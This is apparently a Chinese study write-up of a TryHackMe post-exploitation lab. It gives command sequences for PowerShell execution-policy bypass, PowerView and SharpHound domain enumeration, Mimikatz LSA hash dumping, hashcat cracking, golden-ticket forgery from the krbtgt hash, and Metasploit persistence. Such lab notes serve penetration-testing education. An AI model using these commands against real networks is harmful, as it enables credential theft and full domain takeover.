后渗透利用基础知识 |TryHackMe | Post-Exploitation Basics

后渗透利用基础

使用 powerview 和 bloodhound 进行后渗透枚举、使用 mimikatz 转储哈希和黄金票证攻击、使用 windows 服务器工具和日志收集基本信息

https://github.com/gentilkiwi/mimikatz

PowerVIew - 枚举工具地址

BloodHound - 数据收集脚本地址

---

使用 Powerview 进行枚举

Powerview使用命令的备忘单

1. 启动 powershell - powershell -ep bypass
   1. 使用 ep 参数来绕过 powershell 的执行策略,从而运行脚本
2. 启动 PowerView - . .\PowerView.ps1
3. 枚举域用户 - Get-NetUser | select cn
4. 枚举域组 - Get-NetGroup -GroupName *admin*

Bloodhound 进行枚举

这里使用 neo4j 版本比较随机,不过 bloodhound 尝试了很多版本,使用到 4.0.3 这个版本才正常可以使用

#使用SharpHound导出文件
powershell -ep bypass
. .\SharpHound.ps1
Invoke-Bloodhound -CollectionMethod All -Domain CONTROLLER.local -ZipFileName loot.zip

#然后启动bloodhound
neo4j console
./BloodHound --disable-gpu --disable-software-rasterizer --no-sandbox
#将zip文件导入进去就可以看到了

由于是图形化操作,这里不详细解释

mimikatz

使用 mimikatz 来转储哈希值

1. mimikatz.exe来运行
2. privilege::debug确保输出了 Privilege '20' OK这样就是管理员身份来运行了
3. lsadump::lsa /patch转储哈希值
4. 可以使用 hashcat 来进行破解
   1. Mimikatz 转储的 NTLM 哈希,就是对应 hashcat 的 1000 模式

金票攻击

我们将首先转储 krbtgt 用户的哈希值和 sid，然后创建一张黄金票，并使用该黄金票打开一个新的命令提示符，允许我们访问网络上的任何机器。

1. mimikatz.exe运行
2. privilege::debug确保是管理员的身份
3. lsadump::lsa /inject /name:krbtgt可以找到 krbtgt 用户的 sid 和哈希值
4. kerberos::golden /user: /domain: /sid: /krbtgt: /id:
   1. /user: 想要伪装成的用户名,/domain: 目标域名,/sid: 是目标域的 sid,/id:用户的 RID(一般 administrator 是 500)

使用服务器管理器来进行枚举

由于服务器几乎无需登录，除非进行维护，因此您只需使用 Windows 内置功能（例如服务器管理器）即可轻松进行枚举。如果您已拥有域管理员权限，则可以访问服务器管理器，从而更改信任、添加或删除用户、查看组。这可以作为切入点，查找计算机上存在其他敏感信息的其他用户，或查找域网络中可以访问其他网络的其他用户，以便切换到其他网络并继续测试。

Windows 服务器管理器首次打开时，界面如下。最有趣的主要选项卡是“工具”选项卡和“管理”选项卡。“工具”选项卡包含大部分信息，例如用户、组、信任、计算机等。“管理”选项卡允许您添加角色和功能，但系统管理员可能很快就能掌握。

导航到工具选项卡并选择 Active Directory 用户和计算机,可以在描述中发现一些信息

持久化

使用 msfconsole 生成木马,发送之后,连接,获得一个 meterpreter shell

使用持久化模块

use exploit/windows/local/persistence这个模块默认每 10 秒发送一次有效载荷

set session 1设置为之前拿到的 shell

---